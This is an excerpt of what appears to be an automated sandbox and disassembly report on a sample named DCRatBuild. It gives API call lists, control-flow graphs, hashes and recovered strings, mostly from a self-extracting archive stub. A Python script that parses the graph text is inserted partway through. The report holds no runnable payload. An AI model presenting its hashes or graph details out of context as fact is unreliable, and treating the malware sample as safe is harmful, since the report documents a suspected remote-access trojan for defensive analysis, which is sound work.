                      • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                      • String ID: PNG
                      • API String ID: 3656887471-364855578
                      • Opcode ID: 739fde0bd6a1adfd73453e8ed0c7e6b660c27e361775969de5768bc99d5c5587
                      • Instruction ID: c997053687efb7e2a6fd40bbd5b0be11adaf3b8c3e531b1627012d28e2a36ba3
                      • Opcode Fuzzy Hash: 739fde0bd6a1adfd73453e8ed0c7e6b660c27e361775969de5768bc99d5c5587
                      • Instruction Fuzzy Hash: 98316172204706AFC7109F61DC58D2BFBA9FF85751B088519F90AD2361EB31DD009AB1

                      Control-flow Graph

                      control_flow_graph d6a5f4-d6a774 (executed / not-executed basic blocks; rendered graph edge list not reproduced)
                      APIs
                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A628
                      • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A65E
                      • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A66A
                      • FindNextFileW.KERNEL32(?,?,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A692
                      • GetLastError.KERNEL32(?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A69E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: FileFind$ErrorFirstLast$Next
                      • String ID:
                      • API String ID: 869497890-0
                      • Opcode ID: c749cf721597706053dc7859444f6a17afcc08c39abe562c6455ba722cc49844
                      • Instruction ID: ddc99282034ddc0b3c8bed9f1d8de0faaa1d0db1a2998b649817093dbe4ae0b6
                      • Opcode Fuzzy Hash: c749cf721597706053dc7859444f6a17afcc08c39abe562c6455ba722cc49844
                      • Instruction Fuzzy Hash: DA415E72504641AFC324EF68C884ADAF7E8FF48354F084A2AF5D9D3250D774A9648FB2
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002,00000000), ref: 00D8755E
                      • TerminateProcess.KERNEL32(00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002,00000000), ref: 00D87565
                      • ExitProcess.KERNEL32 ref: 00D87577
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: Process$CurrentExitTerminate
                      • String ID:
                      • API String ID: 1703294689-0
                      • Opcode ID: 0a2d8ff0094312e259a525bdf9b7475f12b121dc5d6b2e3f65e3b8374754b479
                      • Instruction ID: 8513493584ce56ae4766a79ca4ba43cda318a3e2f919be6e1904e36880f7149f
                      • Opcode Fuzzy Hash: 0a2d8ff0094312e259a525bdf9b7475f12b121dc5d6b2e3f65e3b8374754b479
                      • Instruction Fuzzy Hash: 7CE0B635004648ABCF11BF68DD09A497B69EB40745F248455F9099A232CB35DE42CB70
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prolog_memcmp
                      • String ID:
                      • API String ID: 3004599000-0
                      • Opcode ID: c7d4482f80dcc1534d88997652d55410b800017f850a9d2bc3e4866978ea419b
                      • Instruction ID: c2d5bb96863db2fddc22103fc6ddecd18d7d2b2de394f3a159e86d75b330b531
                      • Opcode Fuzzy Hash: c7d4482f80dcc1534d88997652d55410b800017f850a9d2bc3e4866978ea419b
                      • Instruction Fuzzy Hash: 03823A70904245AFDF25CF64C895BFABBB9EF15300F0C42BAE959AB142DB315A48DB70
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D7AEE5
                        • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                        • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: H_prologItemTextWindow
                      • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                      • API String ID: 810644672-3870082069
                      • Opcode ID: f0262b2b2555b69cdc3234d29dc7d1fe142e051510eb241198f3f8178c4ed03c
                      • Instruction ID: 14a32b03595e604df98e7bdffeb955e2fd2abe8e685ed61dde2474a5504028b9
                      • Opcode Fuzzy Hash: f0262b2b2555b69cdc3234d29dc7d1fe142e051510eb241198f3f8178c4ed03c
                      • Instruction Fuzzy Hash: D5420570904345AFEB21ABA09C4AFBE7B7DEB06710F048156F649E62D1EBB44D44DB32

                      Control-flow Graph

                      control_flow_graph 257 d700cf-d700ee call d7e360 GetModuleHandleW 260 d70154-d703b2 257->260 261 d700f0-d70107 GetProcAddress 257->261 262 d70484-d704b3 GetModuleFileNameW call d6bc85 call d6fe56 260->262 263 d703b8-d703c3 call d870dd 260->263 264 d70121-d70131 GetProcAddress 261->264 265 d70109-d7011f 261->265 279 d704b5-d704bf call d6acf5 262->279 263->262 274 d703c9-d703fa GetModuleFileNameW CreateFileW 263->274 264->260 266 d70133-d70152 264->266 265->264 266->260 276 d703fc-d7040a SetFilePointer 274->276 277 d70478-d7047f CloseHandle 274->277 276->277 280 d7040c-d70429 ReadFile 276->280 277->262 286 d704c1-d704c5 call d70085 279->286 287 d704cc 279->287 280->277 282 d7042b-d70450 280->282 284 d7046d-d70476 call d6fbd8 282->284 284->277 293 d70452-d7046c call d70085 284->293 294 d704ca 286->294 288 d704ce-d704d0 287->288 291 d704f2-d70518 call d6bcfb GetFileAttributesW 288->291 292 d704d2-d704f0 CompareStringW 288->292 295 d7051a-d7051e 291->295 301 d70522 291->301 292->291 292->295 293->284 294->288 295->279 300 d70520 295->300 302 d70526-d70528 300->302 301->302 303 d70560-d70562 302->303 304 d7052a 302->304 305 d7066f-d70679 303->305 306 d70568-d7057f call d6bccf call d6acf5 303->306 307 d7052c-d70552 call d6bcfb GetFileAttributesW 304->307 317 d705e7-d7061a call d6400a AllocConsole 306->317 318 d70581-d705e2 call d70085 * 2 call d6ddd1 call d6400a call d6ddd1 call d79f35 306->318 313 d70554-d70558 307->313 314 d7055c 307->314 313->307 316 d7055a 313->316 314->303 316->303 323 d70667-d70669 ExitProcess 317->323 324 d7061c-d70661 GetCurrentProcessId AttachConsole call d835b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323
                      APIs
                      • GetModuleHandleW.KERNEL32(kernel32), ref: 00D700E4
                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D700F6
                      • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D70127
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D703D4
                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D703F0
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D70402
                      • ReadFile.KERNEL32(00000000,?,00007FFE,00D93BA4,00000000), ref: 00D70421
                      • CloseHandle.KERNEL32(00000000), ref: 00D70479
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D7048F
                      • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00D704E7
                      • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00D70510
                      • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00D7054A
                        • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                        • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                      • _swprintf.LIBCMT ref: 00D705BE
                      • _swprintf.LIBCMT ref: 00D7060A
                        • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                      • AllocConsole.KERNEL32 ref: 00D70612
                      • GetCurrentProcessId.KERNEL32 ref: 00D7061C
                      • AttachConsole.KERNEL32(00000000), ref: 00D70623
                      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D70649
                      • WriteConsoleW.KERNEL32(00000000), ref: 00D70650
                      • Sleep.KERNEL32(00002710), ref: 00D7065B
                      • FreeConsole.KERNEL32 ref: 00D70661
                      • ExitProcess.KERNEL32 ref: 00D70669
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                      • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                      • API String ID: 1201351596-3298887752
                      • Opcode ID: dc8939a99cbd915353c8acb3c6529678af04c28ac4c0dcc07bf4c0fbf8d533d5
                      • Instruction ID: 3268a430e0e20869bc9bacf7909711312be4474e19cd2eb238f2f94b612a43e5
                      • Opcode Fuzzy Hash: dc8939a99cbd915353c8acb3c6529678af04c28ac4c0dcc07bf4c0fbf8d533d5
                      • Instruction Fuzzy Hash: 36D13FB1508384EBDB309F50D849B9FBBE8EF85704F54491DF68D96390DBB08A498B72
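The flattened `control_flow_graph` line in this record is the text rendering of the function's basic-block graph: each block is listed as a decimal id, a hexadecimal address range, the `call <addr>` sub-calls and API names that occur in that block, and then the `src->dst` edges. The parser and reachability helper below is an added example, not part of the Joe Sandbox report or its tooling; it assumes only the token shapes visible in that line (including the `call d70085 * 2` repeat notation and single-address blocks such as `294 d704ca`), takes the first listed block as the function entry, and is run here against the graph of this very function to show which API calls lie on the shortest path from the entry to the block that calls `ExitProcess`.

```python
"""Parse a Joe Sandbox 'control_flow_graph' edge list and query reachability on it.

Added example, not part of the report or of Joe Sandbox. Assumed token shapes, all taken
from the graph above: '257 d700cf-d700ee call d7e360 GetModuleHandleW' (block id, hex
address range, annotations), '294 d704ca' (single-address block), 'call d70085 * 2'
(repeated annotation) and '257->260' (edge). The first listed block is taken as the
entry; an all-digit hex address would be misread as a block id (none occurs here).
"""
from __future__ import annotations

import re
from collections import deque
from dataclasses import dataclass, field
from typing import Optional

EDGE = re.compile(r"^(\d+)->(\d+)$")


@dataclass
class Block:
    nid: int
    start: int
    end: int
    calls: list[str] = field(default_factory=list)  # 'call <addr>' targets, in order
    apis: list[str] = field(default_factory=list)   # APIs invoked directly in the block


@dataclass
class Cfg:
    entry: Optional[int] = None
    nodes: dict[int, Block] = field(default_factory=dict)
    succ: dict[int, list[int]] = field(default_factory=dict)


def parse_cfg(text: str) -> Cfg:
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    cfg, cur, last, i = Cfg(), None, None, 0   # last: list that took the previous annotation
    while i < len(toks):
        t = toks[i]
        if (m := EDGE.match(t)):                # 'src->dst'
            cfg.succ.setdefault(int(m.group(1)), []).append(int(m.group(2)))
            i += 1
        elif t.isdigit():                       # '<id> <start>[-<end>]' opens a basic block
            lo, _, hi = toks[i + 1].partition("-")
            cur = cfg.nodes[int(t)] = Block(int(t), int(lo, 16), int(hi or lo, 16))
            cfg.entry = cfg.entry if cfg.entry is not None else cur.nid
            i += 2
        elif t == "call":                       # 'call <addr>': call into another function
            cur.calls.append(toks[i + 1].lower())
            last = cur.calls
            i += 2
        elif t == "*":                          # '* n': previous annotation occurs n times
            last.extend([last[-1]] * (int(toks[i + 1]) - 1))
            i += 2
        else:                                   # bare token: an API name
            cur.apis.append(t)
            last = cur.apis
            i += 1
    return cfg


def blocks_calling(cfg: Cfg, api: str) -> list[int]:
    return sorted(b.nid for b in cfg.nodes.values() if api in b.apis)


def shortest_path(cfg: Cfg, src: int, dst: int) -> Optional[list[int]]:
    """Breadth-first search over successor edges; None if dst is unreachable from src."""
    prev: dict[int, Optional[int]] = {src: None}
    queue = deque([src])
    while queue:
        n = queue.popleft()
        if n == dst:
            path, node = [], n
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for s in cfg.succ.get(n, []):
            if s not in prev:
                prev[s] = n
                queue.append(s)
    return None


def apis_along(cfg: Cfg, path: list[int]) -> list[str]:
    return [a for nid in path for a in cfg.nodes[nid].apis]


# Graph of the DLL-search-path / sideload-check function above, copied verbatim.
SAMPLE_CFG = """control_flow_graph 257 d700cf-d700ee call d7e360 GetModuleHandleW 260 d70154-d703b2 257->260 261 d700f0-d70107 GetProcAddress 257->261 262 d70484-d704b3 GetModuleFileNameW call d6bc85 call d6fe56 260->262 263 d703b8-d703c3 call d870dd 260->263 264 d70121-d70131 GetProcAddress 261->264 265 d70109-d7011f 261->265 279 d704b5-d704bf call d6acf5 262->279 263->262 274 d703c9-d703fa GetModuleFileNameW CreateFileW 263->274 264->260 266 d70133-d70152 264->266 265->264 266->260 276 d703fc-d7040a SetFilePointer 274->276 277 d70478-d7047f CloseHandle 274->277 276->277 280 d7040c-d70429 ReadFile 276->280 277->262 286 d704c1-d704c5 call d70085 279->286 287 d704cc 279->287 280->277 282 d7042b-d70450 280->282 284 d7046d-d70476 call d6fbd8 282->284 284->277 293 d70452-d7046c call d70085 284->293 294 d704ca 286->294 288 d704ce-d704d0 287->288 291 d704f2-d70518 call d6bcfb GetFileAttributesW 288->291 292 d704d2-d704f0 CompareStringW 288->292 295 d7051a-d7051e 291->295 301 d70522 291->301 292->291 292->295 293->284 294->288 295->279 300 d70520 295->300 302 d70526-d70528 300->302 301->302 303 d70560-d70562 302->303 304 d7052a 302->304 305 d7066f-d70679 303->305 306 d70568-d7057f call d6bccf call d6acf5 303->306 307 d7052c-d70552 call d6bcfb GetFileAttributesW 304->307 317 d705e7-d7061a call d6400a AllocConsole 306->317 318 d70581-d705e2 call d70085 * 2 call d6ddd1 call d6400a call d6ddd1 call d79f35 306->318 313 d70554-d70558 307->313 314 d7055c 307->314 313->307 316 d7055a 313->316 314->303 316->303 323 d70667-d70669 ExitProcess 317->323 324 d7061c-d70661 GetCurrentProcessId AttachConsole call d835b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323"""

if __name__ == "__main__":
    g = parse_cfg(SAMPLE_CFG)
    for target in blocks_calling(g, "ExitProcess"):
        print(target, apis_along(g, shortest_path(g, g.entry, target)))
```

Paths are computed over the static edge list only. The executed/not-executed colouring of the rendered graph is not present in the text, so the existence of a path says nothing about whether the sandbox run actually took it; use it to see what must happen before a given API (here, the `AllocConsole`/`WriteConsoleW` warning that precedes `ExitProcess`) rather than as evidence of execution.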

                      Control-flow Graph

                      control_flow_graph 406 d7bdf5-d7be0d call d7e28c call d7e360 411 d7be13-d7be3d call d7aa36 406->411 412 d7ca90-d7ca9d 406->412 411->412 415 d7be43-d7be48 411->415 416 d7be49-d7be57 415->416 417 d7be58-d7be6d call d7a6c7 416->417 420 d7be6f 417->420 421 d7be71-d7be86 call d717ac 420->421 424 d7be93-d7be96 421->424 425 d7be88-d7be8c 421->425 427 d7ca5c-d7ca87 call d7aa36 424->427 428 d7be9c 424->428 425->421 426 d7be8e 425->426 426->427 427->416 439 d7ca8d-d7ca8f 427->439 430 d7c115-d7c117 428->430 431 d7c074-d7c076 428->431 432 d7bea3-d7bea6 428->432 433 d7c132-d7c134 428->433 430->427 435 d7c11d-d7c12d SetWindowTextW 430->435 431->427 437 d7c07c-d7c088 431->437 432->427 438 d7beac-d7bf06 call d79da4 call d6b965 call d6a49d call d6a5d7 call d670bf 432->438 433->427 436 d7c13a-d7c141 433->436 435->427 436->427 440 d7c147-d7c160 436->440 441 d7c09c-d7c0a1 437->441 442 d7c08a-d7c09b call d87168 437->442 494 d7c045-d7c05a call d6a52a 438->494 439->412 444 d7c162 440->444 445 d7c168-d7c176 call d835b3 440->445 448 d7c0a3-d7c0a9 441->448 449 d7c0ab-d7c0b6 call d7ab9a 441->449 442->441 444->445 445->427 462 d7c17c-d7c185 445->462 453 d7c0bb-d7c0bd 448->453 449->453 455 d7c0bf-d7c0c6 call d835b3 453->455 456 d7c0c8-d7c0e8 call d835b3 call d835de 453->456 455->456 481 d7c101-d7c103 456->481 482 d7c0ea-d7c0f1 456->482 466 d7c187-d7c18b 462->466 467 d7c1ae-d7c1b1 462->467 466->467 472 d7c18d-d7c195 466->472 469 d7c1b7-d7c1ba 467->469 470 d7c296-d7c2a4 call d6fe56 467->470 475 d7c1c7-d7c1e2 469->475 476 d7c1bc-d7c1c1 469->476 491 d7c2a6-d7c2ba call d817cb 470->491 472->427 479 d7c19b-d7c1a9 call d6fe56 472->479 495 d7c1e4-d7c21e 475->495 496 d7c22c-d7c233 475->496 476->470 476->475 479->491 481->427 490 d7c109-d7c110 call d835ce 481->490 488 d7c0f3-d7c0f5 482->488 489 d7c0f8-d7c100 call d87168 482->489 488->489 489->481 490->427 505 d7c2c7-d7c318 call d6fe56 call d7a8d0 GetDlgItem SetWindowTextW SendMessageW call d835e9 491->505 506 d7c2bc-d7c2c0 491->506 
512 d7c060-d7c06f call d6a4b3 494->512 513 d7bf0b-d7bf1f SetFileAttributesW 494->513 529 d7c222-d7c224 495->529 530 d7c220 495->530 502 d7c235-d7c24d call d835b3 496->502 503 d7c261-d7c284 call d835b3 * 2 496->503 502->503 516 d7c24f-d7c25c call d6fe2e 502->516 503->491 534 d7c286-d7c294 call d6fe2e 503->534 540 d7c31d-d7c321 505->540 506->505 511 d7c2c2-d7c2c4 506->511 511->505 512->427 518 d7bfc5-d7bfd5 GetFileAttributesW 513->518 519 d7bf25-d7bf58 call d6b4f7 call d6b207 call d835b3 513->519 516->503 518->494 527 d7bfd7-d7bfe6 DeleteFileW 518->527 549 d7bf6b-d7bf79 call d6b925 519->549 550 d7bf5a-d7bf69 call d835b3 519->550 527->494 533 d7bfe8-d7bfeb 527->533 529->496 530->529 537 d7bfef-d7c01b call d6400a GetFileAttributesW 533->537 534->491 547 d7bfed-d7bfee 537->547 548 d7c01d-d7c033 MoveFileW 537->548 540->427 544 d7c327-d7c33b SendMessageW 540->544 544->427 547->537 548->494 551 d7c035-d7c03f MoveFileExW 548->551 549->512 556 d7bf7f-d7bfbe call d835b3 call d7f350 549->556 550->549 550->556 551->494 556->518
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D7BDFA
                        • Part of subcall function 00D7AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D7AAFE
                      • SetWindowTextW.USER32(?,?), ref: 00D7C127
                      • _wcsrchr.LIBVCRUNTIME ref: 00D7C2B1
                      • GetDlgItem.USER32(?,00000066), ref: 00D7C2EC
                      • SetWindowTextW.USER32(00000000,?), ref: 00D7C2FC
                      • SendMessageW.USER32(00000000,00000143,00000000,00DAA472), ref: 00D7C30A
                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D7C335
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2142291565.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                      • Associated: 00000000.00000002.2142268351.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142327927.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142351281.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2142426808.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d60000_DCRatBuild.jbxd
                      Similarity
                      • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                      • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                      • API String ID: 3564274579-312220925
                      • Opcode ID: 40857879e18f360ede30e6d781a7af194669d6d13ec3c117d3df526f59addd4a
                      • Instruction ID: d52dd1e32aee301892ae5d0de0771bcca8428c226819231c9676bed654bc8699
                      • Opcode Fuzzy Hash: 40857879e18f360ede30e6d781a7af194669d6d13ec3c117d3df526f59addd4a
                      • Instruction Fuzzy Hash: C5E14E72D00619AEDB25EBA4DC45EEE777CEF08711F1481AAF909E2151FB709A848B70

                      Control-flow Graph

                      control_flow_graph 561 d6d341-d6d378 call d7e28c call d7e360 call d815e8 568 d6d37a-d6d3a9 GetModuleFileNameW call d6bc85 call d6fe2e 561->568 569 d6d3ab-d6d3b4 call d6fe56 561->569 572 d6d3b9-d6d3dd call d69619 call d699b0 568->572 569->572 580 d6d3e3-d6d3eb 572->580 581 d6d7a0-d6d7a6 call d69653 572->581 583 d6d3ed-d6d405 call d73781 * 2 580->583 584 d6d409-d6d438 call d85a90 * 2 580->584 585 d6d7ab-d6d7bb 581->585 595 d6d407 583->595 594 d6d43b-d6d43e 584->594 596 d6d444-d6d44a call d69e40 594->596 597 d6d56c-d6d58f call d69d30 call d835d3 594->597 595->584 601 d6d44f-d6d476 call d69bf0 596->601 597->581 606 d6d595-d6d5b0 call d69bf0 597->606 607 d6d535-d6d538 601->607 608 d6d47c-d6d484 601->608 622 d6d5b2-d6d5b7 606->622 623 d6d5b9-d6d5cc call d835d3 606->623 612 d6d53b-d6d55d call d69d30 607->612 610 d6d486-d6d48e 608->610 611 d6d4af-d6d4ba 608->611 610->611 614 d6d490-d6d4aa call d85ec0 610->614 615 d6d4e5-d6d4ed 611->615 616 d6d4bc-d6d4c8 611->616 612->594 626 d6d563-d6d566 612->626 637 d6d4ac 614->637 638 d6d52b-d6d533 614->638 620 d6d4ef-d6d4f7 615->620 621 d6d519-d6d51d 615->621 616->615 618 d6d4ca-d6d4cf 616->618 618->615 625 d6d4d1-d6d4e3 call d85808 618->625 620->621 627 d6d4f9-d6d513 call d85ec0 620->627 621->607 628 d6d51f-d6d522 621->628 629 d6d5f1-d6d5f8 622->629 623->581 642 d6d5d2-d6d5ee call d7137a call d835ce 623->642 625->615 643 d6d527 625->643 626->581 626->597 627->581 627->621 628->608 633 d6d5fc-d6d625 call d6fdfb call d835d3 629->633 634 d6d5fa 629->634 651 d6d627-d6d62e call d835ce 633->651 652 d6d633-d6d649 633->652 634->633 637->611 638->612 642->629 643->638 651->581 654 d6d731-d6d757 call d6ce72 call d835ce * 2 652->654 655 d6d64f-d6d65d 652->655 692 d6d771-d6d79d call d85a90 * 2 654->692 693 d6d759-d6d76f call d73781 * 2 654->693 658 d6d664-d6d669 655->658 659 d6d66f-d6d678 658->659 660 d6d97c-d6d984 658->660 662 d6d684-d6d68b 659->662 663 d6d67a-d6d67e 659->663 664 d6d98a-d6d98e 660->664 665 d6d72b-d6d72e 
660->665 667 d6d880-d6d891 call d6fcbf 662->667 668 d6d691-d6d6b6 662->668 663->660 663->662 669 d6d990-d6d996 664->669 670 d6d9de-d6d9e4 664->670 665->654 694 d6d976-d6d979 667->694 695 d6d897-d6d8c0 call d6fe56 call d85885 667->695 674 d6d6b9-d6d6de call d835b3 call d85808 668->674 675 d6d722-d6d725 669->675 676 d6d99c-d6d9a3 669->676 672 d6d9e6-d6d9ec 670->672 673 d6da0a-d6da2a call d6ce72 670->673 672->673 679 d6d9ee-d6d9f4 672->679 697 d6da02-d6da05 673->697 711 d6d6f6 674->711 712 d6d6e0-d6d6ea 674->712 675->658 675->665 682 d6d9a5-d6d9a8 676->682 683 d6d9ca 676->683 679->675 687 d6d9fa-d6da01 679->687 690 d6d9c6-d6d9c8 682->690 691 d6d9aa-d6d9ad 682->691 686 d6d9cc-d6d9d9 683->686 686->675 687->697 690->686 699 d6d9c2-d6d9c4 691->699 700 d6d9af-d6d9b2 691->700 692->581 693->692 694->660 695->694 720 d6d8c6-d6d93c call d71596 call d6fdfb call d6fdd4 call d6fdfb call d858d9 695->720 699->686 705 d6d9b4-d6d9b8 700->705 706 d6d9be-d6d9c0 700->706 705->679 713 d6d9ba-d6d9bc 705->713 706->686 718 d6d6f9-d6d6fd 711->718 712->711 717 d6d6ec-d6d6f4 712->717 713->686 717->718 718->674 721 d6d6ff-d6d706 718->721 754 d6d93e-d6d947 720->754 755 d6d94a-d6d95f 720->755 723 d6d7be-d6d7c1 721->723 724 d6d70c-d6d71a call d6fdfb 721->724 723->667 726 d6d7c7-d6d7ce 723->726 728 d6d71f 724->728 730 d6d7d6-d6d7d7 726->730 731 d6d7d0-d6d7d4 726->731 728->675 730->726 731->730 733 d6d7d9-d6d7e7 731->733 735 d6d808-d6d830 call d71596 733->735 736 d6d7e9-d6d7ec 733->736 743 d6d832-d6d84e call d835e9 735->743 744 d6d853-d6d85b 735->744 739 d6d805 736->739 740 d6d7ee-d6d803 736->740 739->735 740->736 740->739 743->728 747 d6d862-d6d87b call d6dd6b 744->747 748 d6d85d 744->748 747->728 748->747 754->755 756 d6d960-d6d967 755->756 757 d6d973-d6d974 756->757 758 d6d969-d6d96d 756->758 757->756 758->728 758->757
                      APIs
                      • __EH_prolog.LIBCMT ref: 00D6D346
                      • _wcschr.LIBVCRUNTIME ref: 00D6D367
                      • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00D6D328,?), ref: 00D6D382
                      • __fprintf_l.LIBCMT ref: 00D6D873
                        • Part of subcall function 00D7137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D6B652,00000000,?,?,?,000103F6), ref: 00D71396
